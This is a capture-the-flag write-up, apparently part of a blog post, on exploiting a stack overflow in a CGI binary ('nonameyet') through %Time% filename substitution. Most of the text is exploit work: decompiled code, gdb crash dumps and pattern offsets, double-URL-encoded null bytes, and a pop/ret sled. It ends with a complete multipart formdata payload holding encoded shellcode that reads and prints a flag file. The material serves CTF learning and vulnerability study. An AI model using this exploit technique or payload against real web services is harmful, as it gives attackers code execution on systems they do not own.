Read line ''
Wrote photo (test) to file: /tmp/cgilibWFDOKJ
Read line '-----------------------------13141138687192'
photo found as test
Content-type: text/html
Cookie: YmFzZQA=<meta http-equiv='refresh' content='0;url=../thanks.php'>[Inferior 1 (process 7579) exited normally]

That looks pretty good! In truth, it took a bit of playing around to get to this point. Now we have everything specified in our form being read. The file contents were written and parsed and if we look in the /photos directory we see a file named base with the contents test:

$ ls photos/
base
$ cat photos/base
test

Where is the bug? If you look back up in the main() function you will see a subroutine I labeled “interesting”. The only way to get to this function is to have a valid photo returned from cgiGetFile(). Here is the decompiled source code for the interesting function:

unsigned int __usercall interesting@<eax>(int edi0@<edi>, char *a2@<esi>, int a1)
{
  unsigned int result; // eax@1
  void *v4; // esp@2
  char v5; // bl@3
  int v6; // edx@3
  int v7; // ecx@3
  void *v8; // esp@4
  int v9; // ecx@7
  unsigned int v10; // ecx@8
  void *v11; // edi@9
  unsigned int v12; // ecx@11
  void *v13; // edi@12
  unsigned int v14; // ecx@14
  void *v15; // edi@15
  unsigned int v16; // ecx@17
  void *v17; // edi@18
  unsigned int v18; // ecx@20
  void *v19; // edi@21
  int v20; // eax@25
  int v21; // [sp+0h] [bp-20h]@2
  unsigned int counter_1; // [sp+8h] [bp-18h]@1
  const void *esp_ptr; // [sp+Ch] [bp-14h]@2
  int file_name_size; // [sp+10h] [bp-10h]@2
  int filename; // [sp+14h] [bp-Ch]@2
  int type_mult_2; // [sp+18h] [bp-8h]@2
  int counter; // [sp+1Ch] [bp-4h]@1

  result = 0;
  counter = 0;
  counter_1 = 0;
  if ( a1 )
  {
    file_name_size = *(_DWORD *)(a1 + 4);
    type_mult_2 = 2 * file_name_size;
    v4 = alloca(2 * file_name_size);
    esp_ptr = &v21;
    filename = *(_DWORD *)a1;
    while ( 1 )
    {
      while ( 1 )
      {
        v5 = *(_BYTE *)(counter + filename);
        v6 = counter++ + filename + 1;
        v7 = type_mult_2;
        if ( type_mult_2 <= (signed int)counter_1 )
        {
          v8 = alloca(type_mult_2);
          qmemcpy(&v21, &v21, type_mult_2);
          a2 = (char *)&v21 + v7;
          edi0 = (int)((char *)&v21 + v7);
          esp_ptr = &v21;
          type_mult_2 *= 2;
        }
        if ( v5 != '%' || *(_BYTE *)(v6 + 4) != '%' )
        {
          *((_BYTE *)esp_ptr + counter_1++) = v5;
          goto LABEL_24;
        }
        v9 = *(_DWORD *)v6;
        v6 += 5;
        counter += 5;
        if ( v9 != 'rneG' )
          break;
        v10 = *(_DWORD *)(a1 + 12);
        a2 = *(char **)(a1 + 8);
        if ( a2 )
        {
          v11 = (char *)esp_ptr + counter_1;
          counter_1 += v10;
          qmemcpy(v11, a2, v10);
          a2 += v10;
          edi0 = (int)((char *)v11 + v10);
LABEL_24:
          if ( file_name_size <= counter )
          {
            v20 = mmap(v6, edi0, (int)a2);
            qmemcpy((void *)v20, esp_ptr, counter_1);
            *(_DWORD *)a1 = v20;
            result = counter_1;
            *(_DWORD *)(a1 + 4) = counter_1;
            return result;
          }
        }
      }
      switch ( v9 )
      {
        case 'emiT':
          v12 = *(_DWORD *)(a1 + 20);
          a2 = *(char **)(a1 + 16);
          if ( a2 )
          {
            v13 = (char *)esp_ptr + counter_1;
            counter_1 += v12;
            qmemcpy(v13, a2, v12);
            a2 += v12;
            edi0 = (int)((char *)v13 + v12);
            goto LABEL_24;
          }
          break;
        case 'etaD':
          v14 = *(_DWORD *)(a1 + 28);
          a2 = *(char **)(a1 + 24);
          if ( a2 )
          {
            v15 = (char *)esp_ptr + counter_1;
            counter_1 += v14;
            qmemcpy(v15, a2, v14);
            a2 += v14;
            edi0 = (int)((char *)v15 + v14);
            goto LABEL_24;
          }
          break;
        case 'YxiP':
          v16 = *(_DWORD *)(a1 + 36);
          a2 = *(char **)(a1 + 32);
          if ( a2 )
          {
            v17 = (char *)esp_ptr + counter_1;
            counter_1 += v16;
            qmemcpy(v17, a2, v16);
            a2 += v16;
            edi0 = (int)((char *)v17 + v16);
            goto LABEL_24;
          }
          break;
        case 'XxiP':
          v18 = *(_DWORD *)(a1 + 44);
          a2 = *(char **)(a1 + 40);
          if ( a2 )
          {
            v19 = (char *)esp_ptr + counter_1;
            counter_1 += v18;
            qmemcpy(v19, a2, v18);
            a2 += v18;
            edi0 = (int)((char *)v19 + v18);
            goto LABEL_24;
          }
          break;
      }
    }
  }
  return result;
}

There are a few things that jump out at me right away. The first is the use of the alloca() function. The man page for alloca states “The alloca() function allocates size bytes of space in the stack frame of the caller. This temporary space is automatically freed when the function that called alloca() returns to its caller.” Thus, we are dynamically growing the stack based upon file_name_size. This function call ends up being just a “sub esp” instruction in the assembly code, so don’t expect to see an import to alloca in the ELF header.

The next thing I notice are the case statements looking for 4 character string patterns of: Genr, Time, Date, PixY, and PixX. IDA shows these in little endian (backwards) format. The program checks for % characters in the filename input that are followed by another % character 4 character later. Thus, we are looking for DOS style variables like %Genr%. It turns out all of these variables are passed in as the third argument to the interesting function.

They are built into a structure that is 0x30 bytes long. First the sizes are built with calls to v3 = cgiGetValue((int)s_cgi, “base”); and the like. Then the strings for the variables are built immediately before the sizes. The IDA decompilation of the main function does not identify this as a structure. However, the memset(&v3, 0, 0x30u); and the fact that only v3 is passed into a function that clearly needs all of these variables is a big clue that this is a structure, or an array of structures, instead of 12 individual variables. The v3 variable in main() (or a1 in interesting()) ends up looking like this:

struct v3 {
	char * filename;
	unsigned int file_name_size;
	char * genr_str;
	unsigned int genr_size;
	char * time_str;
	unsigned int time_size;
	char * date_str;
	unsigned int date_size;
	char * pixy_str;
	unsigned int pixy_size;
	char * pixx_str;
	unsigned int pixx_size;
};

Have you spotted the bug yet? If not, go back to what is happening with our input in the interesting function. We pass this structure into our function, alloca (file_name_size * 2) and then what? We start copying into this array. It’s the qmemcpy calls that are in question here. These are presented in assembly as rep movsb instructions. Ask yourself how much data is being copied and what is the size of the destination buffer? Do you control the data being copied into the buffer? What variables are being updated in the loops to affect the starting offsets of the copy? Study the code and see if you can answer some of these questions. Do it now, I will wait.

Vulnerability Discovery

What you might notice is that after the program takes the length of file_name, doubles it, and allocates that amount of space on the stack, it will then proceed to copy in the values for the other variables from the structure. For example, if I set the filename “foobar” (name=”photo”; filename=”foobar” in my formdata file) and then if I set the Time input to be AAAAAA the CGI program will allocate 14 bytes on the stack (length of “foobar\0” * 2) and then copy in the value of the %Time% variable, which would also be 6 bytes. This will be clearer when looking at the actual input file.

The bug comes in if we make the length of Time larger than the length of file_name while having file_name reference %Time%. There is no check to see if we have enough stack space left. This is a stack overflow. The only issue is that if we try to encode a %Time% variable directly into the file_name then the program never gets to the interesting function! For clarity, this is what the formdata file looks like now for testing:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%Time%"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
-----------------------------13141138687192
Content-Disposition: form-data; name="Time"

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----------------------------13141138687192--

The %Time% bit does not parse correctly and we miss the check for % in the filename. This is because the variables are being URL decoded. If I set it to %25Time%25 it will decode properly as %Time% (0x25 = ‘%’). The other problem I ran into with this input is that although the %Time% variable is case sensitive when the time pointers and sizes are actually set in the structure it is looked up with lower case only. So, name=”time” and filename=”%25Time%25” will produce the following crash:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x41414141 ('AAAA')
EDX: 0x80500a6 --> 0x0
ESI: 0x41414141 ('AAAA')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ('A'<repeats 46 times>)
ESP: 0xbffff60a ('A'<repeats 92 times>)
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a:   mov    edi,eax
   0x804cf9c:   mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ('A'<repeats 92 times>)
0004| 0xbffff60e ('A'<repeats 88 times>)
0008| 0xbffff612 ('A'<repeats 84 times>)
0012| 0xbffff616 ('A'<repeats 80 times>)
0016| 0xbffff61a ('A'<repeats 76 times>)
0020| 0xbffff61e ('A'<repeats 72 times>)
0024| 0xbffff622 ('A'<repeats 68 times>)
0028| 0xbffff626 ('A'<repeats 64 times>)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$

Huzzah! We’ve exercised the stack overflow and crashed on a memcpy(). If we can get the function to return we will have control over EIP. We are actually really close to the function return at this point as well. The ret instruction is at 0x0804CFB0, just a short 14 bytes away.

Let’s see if we can get around this crash. The rep movs instruction will move ECX number of bytes from the pointer in ESI to the pointer in EDI. Here, ECX is set to 0x41414141. Clearly we overwrote the size used in this copy. We could look at the stack frame and do the math with the allocas to figure out exactly which offset the counter is coming from, but it is faster to just put in a string pattern in the time variable.

We run it again with formdata of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV
-----------------------------13141138687192—

Debugging this gives us the following:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x1000
ECX: 0x47474646 ('FFGG')
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV")
EIP: 0x804cfa2 (rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi])
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9a:   mov    edi,eax
   0x804cf9c:   mov    esi,DWORD PTR [ebp-0x14]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
=> 0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
   0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
 [------------------------------------------------------------------------------]
Stopped reason: SIGSEGV
0x0804cfa2 in ?? ()
gdb-peda$

We can go back to our input file and replace the “FFGG” with NULLS so that no copy is executed. My first attempt was to inject raw NULL bytes into this file. I ran the following python script to get the job done. It’s not pretty, but it worked. I could also have used vi with %!xxd and %!xxd –r or any other hex editor to makes these changes.

$ python
Python 2.7.5+ (default, Feb 27 2014, 19:39:55)
[GCC 4.8.1] on linux2
Type "help", "copyright", "credits" or "license" for more information.>>> a=open("formdata","rb")>>> t=a.read()>>> t.find("FFGG")
286>>> l=t.find("FFGG")>>> t[l:l+4]'FFGG'>>> def strow(instr, owstr, offset):
...   return instr[:offset] + owstr + instr[offset+len(owstr):]
...>>> p=strow(t, "\0\0\0\0", 286)>>> y=open("file2","wb")>>> y.write(p)>>> y.close()

While the python script properly modified the file, this technique did not work. ECX, instead of NULL, was set to 0x2d2d2d2d or “—-“. This value is coming from our boundary on the multipart data. I assumed that because we used NULL bytes that they must be causing early termination of string parsing routines. What if we URL encode the NULL bytes?

Setting the time variable to “AAAABBBBCCCCDDDDEEEEFF%00%00%00%00GGHHHHIIII” and debugging once again yields:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata
Content-type: text/html
Cookie: AA==<p>ERROR: 906</p><meta http-equiv='refresh' content='0;url=../thanks.php'>[Inferior 1 (process 1834) exited normally]
Warning: not running or target is remote
gdb-peda$

Well that was a step in the wrong direction! There is no crash now. We are seeing the ERROR: 906 coming back, which is what happens when the photo file being uploaded fails to open. The cookie coming back to us in the HTTP header is the name of this file. The base64 decoding of “AA==“ is 0x00, so it is understandable that that file did not open. I think we are running into similar issues with the string parsing again. This is as far as I got during the actual CTF.

It was not until afterwards that it was pointed out to me that we can double URL encode the NULL values. If URL encoding once makes 0x00 = %00 then URL encoding twice will be 0x00 = %00 = %25%30%30. With my formdata file now looking like this:

-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP
-----------------------------13141138687192—

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xb7fd9000 --> 0x0
EBX: 0x4f4f4e4e ('NNOO')
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0xbffff638 ("LLMMMMNNNNOOOOPPPP")
ESP: 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
EIP: 0x804cfa7 (mov    DWORD PTR [ebx],eax)
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x804cf9f:   mov    ecx,DWORD PTR [ebp-0x18]
   0x804cfa2:   rep movs BYTE PTR es:[edi],BYTE PTR ds:[esi]
   0x804cfa4:   mov    ebx,DWORD PTR [ebp+0x8]
=> 0x804cfa7:   mov    DWORD PTR [ebx],eax
   0x804cfa9:   mov    eax,DWORD PTR [ebp-0x18]
   0x804cfac:   mov    DWORD PTR [ebx+0x4],eax
   0x804cfaf:   leave
   0x804cfb0:   ret
[------------------------------------stack-------------------------------------]
0000| 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
0004| 0xbffff60e ("BBBBCCCCDDDDEEEEFF")
0008| 0xbffff612 ("CCCCDDDDEEEEFF")
0012| 0xbffff616 ("DDDDEEEEFF")
0016| 0xbffff61a ("EEEEFF")
0020| 0xbffff61e --> 0x4646 ('FF')
0024| 0xbffff622 --> 0x47470000 ('')
0028| 0xbffff626 ("HHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0804cfa7 in ?? ()
gdb-peda$

Awesome, we got past the rep movs with a NULL ECX and we are now 9 bytes away. The crash is now on the instruction 0x804cfa7: mov DWORD PTR [ebx],eax where EBX is 0x4f4f4e4e. We are writing EAX to this pointer. We can set this to be anywhere in memory that is writeable to avoid this crash. At the offset for “NNOO” let’s put in 0x0804F0EC, which is just past the end of the .BSS section. That address is mapped into our memory space and will be NULL and unused throughout the program. We will need to little endian encode and URL encode this pointer resulting in: %EC%F0%04%08.

Now with a formdata file of:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP
-----------------------------13141138687192—

We get a debugger output of:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0x4e4e4d4d ('MMNN')
EFLAGS: 0x10206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x4e4e4d4d
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x4e4e4d4d in ?? ()
gdb-peda$

Excellent! EIP: 0x4e4e4d4d. I can now control the next instruction that this program executes. Our goal is to send EIP back to a buffer that we control. Let’s find everywhere in memory that our input string exists:

gdb-peda$ searchmem AAAABBBB
Searching for 'AAAABBBB' in: None ranges
Found 3 results, display max 3 items:
 [heap] : 0x80501b8 ("AAAABBBBCCCCDDDDEEEEFF")
 mapped : 0xb7fda108 ("AAAABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMMMMNN%EC%F0%04%08OOPPPP\r\n", '-'<repeats 29 times>, "13141138687192--\r\n")
[stack] : 0xbffff60a ("AAAABBBBCCCCDDDDEEEEFF")
gdb-peda$ vmmap
Start      End        Perm      Name
0x08048000 0x0804e000 r-xp      /home/bool/nonameyet.cgi
0x0804e000 0x0804f000 r-xp      /home/bool/nonameyet.cgi
0x0804f000 0x08050000 rwxp      /home/bool/nonameyet.cgi
0x08050000 0x08071000 rwxp      [heap]
0xb7e1e000 0xb7e1f000 rwxp      mapped
0xb7e1f000 0xb7fcd000 r-xp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fcd000 0xb7fcf000 r-xp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fcf000 0xb7fd0000 rwxp      /lib/i386-linux-gnu/libc-2.17.so
0xb7fd0000 0xb7fd3000 rwxp      mapped
0xb7fd9000 0xb7fdd000 rwxp      mapped
0xb7fdd000 0xb7fde000 r-xp      [vdso]
0xb7fde000 0xb7ffe000 r-xp      /lib/i386-linux-gnu/ld-2.17.so
0xb7ffe000 0xb7fff000 r-xp      /lib/i386-linux-gnu/ld-2.17.so
0xb7fff000 0xb8000000 rwxp      /lib/i386-linux-gnu/ld-2.17.so
0xbffdf000 0xc0000000 rwxp      [stack]

I have three choices for direct execution: heap, mapped, or stack. All of the sections are executable. If I run the binary again and do the same search we can determine if any of these sections are affected by ASLR. They all looked stable between runs to me. Remember this for later.

My preference is to use the mapped section because it looks like it has a complete copy of the data exactly as I sent it in. Other options here are to look for more input vectors, specifically cookies and other variables. Let’s use python again to set the “AAAA” in our input to \xcc\xcc\xcc\xcc so that we might trigger an int 3 debugging break point.

Next, let’s overwrite the “MMNN” offset that was in EIP with the little endian URL encoded address of %08%a1%fd%b7 (0xb7fda108) that should point directly to the start of our data (int 3) in the mapped section. If all goes well, we should expect to see a SIGTRAP.

The formdata file is:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

▒▒▒▒BBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%08%a1%fd%b7%EC%F0%04%08OOPPPP
-----------------------------13141138687192—

The debugger output is:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ set args < formdata
gdb-peda$ r
Starting program: /home/bool/nonameyet.cgi < formdata

Program received signal SIGTRAP, Trace/breakpoint trap.
[----------------------------------registers-----------------------------------]
EAX: 0x0
EBX: 0x804f0ec --> 0xb7fd9000 --> 0x0
ECX: 0x0
EDX: 0x80500a6 --> 0x0
ESI: 0x48484747 ('GGHH')
EDI: 0xb7fd9000 --> 0x0
EBP: 0x4d4d4c4c ('LLMM')
ESP: 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
EIP: 0xb7fda109 --> 0x42cccccc
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7fda0fc:  gs
   0xb7fda0fd:  cmp    eax,0x6d697422
   0xb7fda102:  and    cl,BYTE PTR gs:0xcc0a0d0a
=> 0xb7fda109:  int3
   0xb7fda10a:  int3
   0xb7fda10b:  int3
   0xb7fda10c:  inc    edx
   0xb7fda10d:  inc    edx
[------------------------------------stack-------------------------------------]
0000| 0xbffff640 --> 0x804f0ec --> 0xb7fd9000 --> 0x0
0004| 0xbffff644 ("OOPPPP")
0008| 0xbffff648 --> 0xff005050
0012| 0xbffff64c --> 0x1
0016| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0020| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0024| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0028| 0xbffff65c --> 0x80500a0 ("%Time%")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGTRAP
0xb7fda109 in ?? ()
gdb-peda$

Great! We have arbitrary code execution now. Unfortunately, the start of our string only affords us 22 bytes of execution before we run into the NULL encoded ECX register from earlier. We now have two options. The first is to make the filename larger than %25Time%25 so that more stack is allocated and our offsets are further into the file. The second option I see is to encode a short relative jump instruction in place of the int 3. Because we are doing this from a flat file and not an exploit script it would be very easy to lose track of shifting offsets, so I opted for the second option.

Currently, the start of the “OOPP” that ends our input string is 105 bytes away. I can encode a jump as %eb%67 to jump +105 bytes forward and land right on my data. After a bit of trial and error building the input file I was able to line everything up just right and gain code execution when running in gdb. I simply replaced the “OOPPPP” with my shellcode to open /home/nonameyet/flag, read it to the stack, and write it to stdout. Note that this shellcode would not trigger the .bash_alias backdoor from earlier!

However, when I run it outside of the debugger I get a segmentation fault. This is a common annoyance when writing exploits. Things can change when they are being debugged. I ran a strace command to see if any of the shellcode was making system calls:

$ ./nonameyet.cgi < formdata2
…
old_mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0xb76ff000
--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0xb7fda108} ---
+++ killed by SIGSEGV (core dumped) +++

Nope, I never got execution. With si_addr=0xb7fda108 I am at least still jumping to the correct spot. What I notice is that the mmap call is returning 0xb76ff000. This is not what I was seeing as a consistent address for my data on the 0xb7fda000 page. So, that address does not exist and we need to go back to pick one of the other two points where we have code. Let’s pick the heap this time with an address of 0x080501b8 as our new EIP.

After modifying the formdata file again and setting a break point on the return from the interesting function, it looks like the heap address has moved as well. It is now at [heap] : 0x8050318 (“AAAABBBBCCCCDDDDEEEEFF”). I suggest that this changed because our input lengths have changed since I last looked. I’ve added shellcode now after all.

The base address for the heap is still in the same spot: 0x08050000. It is just the offset within that page that has shifted. Let’s put in the new address for EIP and try our luck with yet another run. The other thing that is different about this heap location is that all of our data has already been URL decoded. Thus, we will need to URL encode all of our binary values. This includes the shellcode.

This time it hits a SIGTRAP again and we can redo our relative short jump calculation jump to land on arbitrary shellcode. We are executing at 0x08050318 and we need to jump to 0x08050352, or 58 bytes away, which means we should us an opcode of “\xeb\x38”. Setting this at the start jumps perfectly to our shellcode, which now executes just fine in the debugger. Again.

But, once again, running without the debugger attached produces a crash! It appears that the heap moves as well. This makes logical sense. If the mmap call is moving and the heap is allocated in a similar way, then they both should move with ASLR. We could try the stack location by building in a large NOP (\x90) sled before our shellcode and go about guessing stack addresses despite ASLR, brute forcing the return address used for EIP. I’ve shamefully used this technique in past CTF events with success.

The whole problem here, and the reason I’ve failed to exploit twice, is that GDB has disabled ASLR. Remember when I checked it earlier? I could have saved myself a lot of time if I had realized this back then. While having your debugger turn off ASLR makes debugging easier, it leads to false hope. Let this be a lesson to always run the set disable-randomization off command in GDB when starting exploit development on a binary. I believe this default ASLR disabled state is actually coming from the PEDA GDB init script I am using. I have another idea that should work with ASLR.

Remember that data structure passed into the interesting function? Well, there is no reason why we only have to fill out the “filename” and “time” variables. If we set the “date” variable there will be a pointer to the date value on the stack. We can put our shellcode in there and use a technique called a return sled to get down the stack.

Here is a short debugging session showing the stack at the beginning of the interesting function:

$ gdb ./nonameyet.cgi
Reading symbols from ./nonameyet.cgi...(no debugging symbols found)...done.
gdb-peda$ break *0x0804CE3B
Breakpoint 1 at 0x804ce3b
gdb-peda$ set args < formdata3
gdb-peda$ r

Breakpoint 1, 0x0804ce3b in ?? ()
gdb-peda$ stack 20
0000| 0xbffff63c --> 0x80492eb (test   eax,eax) # return address in main()
0004| 0xbffff640 --> 0xbffff65c --> 0x80500a0 ("%Time%")
0008| 0xbffff644 --> 0xbffff68c --> 0xe
0012| 0xbffff648 --> 0xffffffff
0016| 0xbffff64c --> 0x1
0020| 0xbffff650 --> 0xb7e2bb98 --> 0x2a5c ('\\*')
0024| 0xbffff654 --> 0xb7fdc858 --> 0xb7e1f000 --> 0x464c457f
0028| 0xbffff658 --> 0xbffff866 ("/home/bool/nonameyet.cgi")
0032| 0xbffff65c --> 0x80500a0 ("%Time%")
0036| 0xbffff660 --> 0x7
0040| 0xbffff664 --> 0x0
0044| 0xbffff668 --> 0x0
0048| 0xbffff66c --> 0x80501b8 --> 0x414138eb   # this is the time variable
0052| 0xbffff670 --> 0x3b (';')                 # time variable length
0056| 0xbffff674 --> 0x8050348 --> 0xf0ec8166   # date variable
0060| 0xbffff678 --> 0x54 ('T')                 # date variable length
0064| 0xbffff67c --> 0x0
0068| 0xbffff680 --> 0x0
0072| 0xbffff684 --> 0x0
0076| 0xbffff688 --> 0x0
gdb-peda$

If we replace our original return address with 0x08048945 (the address of a ret instruction) and then immediately following this address place the same address again, the program will return twice and the stack will be incremented by 8. We can do this all the way down the stack until we reach our pointer to the date variable. A little math tells us (0xbffff674 - 0xbffff63c) / 4 that we need to put the pointer to the ret instruction on the stack 14 times to reach the pointer to our shellcode.

One problem. When I go to edit the time variable I see that we have &l;teip> then <bss> address in the time variable. This was required to survive the write from earlier. I will not be able to write to the text section of the binary so I cannot use this address for the ret sled. Because the number of addresses is even, I can point the return sled to a pop ret gadget and have a pop/ret sled instead. There is a pop just one byte before the previous ret address at 0x08048944. I will still need to put this address in 14 times but every other instance will not be executed.

My first attempt at this failed as well! When I looked at the stack, the pointer for the “date” variable was not where it should be. The length was correct but we were returning into NULLs. Looking a little closer, I noticed that the pointer for this variable ended with 0x00. Of course, the time variable was null terminating on the stack. My length was off by one. Since I am already doing a pop/ret sled the pointer immediately before the date pointer is not executed. It could really be anything. I made the time variable one byte shorter and FINALLY gained code execution outside of a debugger. Here is the completed formdata file and execution printing out /home/nonameyet/flag:

$ cat formdata
-----------------------------13141138687192
Content-Disposition: form-data; name="photo"; filename="%25Time%25"
Content-Type: application/octet-stream

file contents

-----------------------------13141138687192
Content-Disposition: form-data; name="time"

%eb%38AABBBBCCCCDDDDEEEEFF%25%30%30%25%30%30%25%30%30%25%30%30GGHHHHIIIIJJJJKKKKLLLLMM%44%89%04%08%EC%F0%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04%08%44%89%04
-----------------------------13141138687192
Content-Disposition: form-data; name="date"

%66%81%EC%F0%01%83%E4%F8%EB%30%5E%89%F3%31%C9%31%C0%B0%05%CD%80%89%C3%89%F1%31%D2%B2%FF%31%C0%B0%03%CD%80%BB%FF%FF%FF%FF%F7%DB%89%F1%88%C2%31%C0%B0%04%CD%80%31%C0%B0%01%CD%80%E8%CB%FF%FF%FF%2F%68%6F%6D%65%2F%6E%6F%6E%61%6D%65%79%65%74%2F%66%6C%61%67%00
-----------------------------13141138687192--

